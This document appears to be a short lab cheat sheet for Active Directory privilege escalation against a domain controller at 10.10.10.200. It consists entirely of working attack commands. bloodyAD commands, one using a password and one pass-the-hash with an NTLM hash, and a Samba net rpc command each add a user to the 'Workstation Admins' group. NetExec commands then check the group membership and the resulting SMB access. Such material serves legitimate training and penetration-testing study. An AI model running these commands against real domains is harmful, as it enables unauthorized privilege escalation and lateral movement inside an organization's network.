Set variables:
export DC=10.10.10.200
export DOMAIN=ootw.local
Add a controlled user to a group with bloodyAD:
bloodyAD -d $DOMAIN --host $DC -u attacker.user -p 'Password123!' add groupMember 'Workstation Admins' alice.wright
With an NTLM hash:
bloodyAD -d $DOMAIN --host $DC -u attacker.user -p :NTLM_HASH add groupMember 'Workstation Admins' alice.wright
Alternative with Samba tooling:
net rpc group addmem 'Workstation Admins' alice.wright -U 'OOTW/attacker.user%Password123!' -S $DC
Validate membership:
nxc ldap $DC -d $DOMAIN -u alice.wright -p 'StudentPass2026!' --groups
Validate the resulting access:
nxc smb 10.10.10.201 -d $DOMAIN -u alice.wright -p 'StudentPass2026!'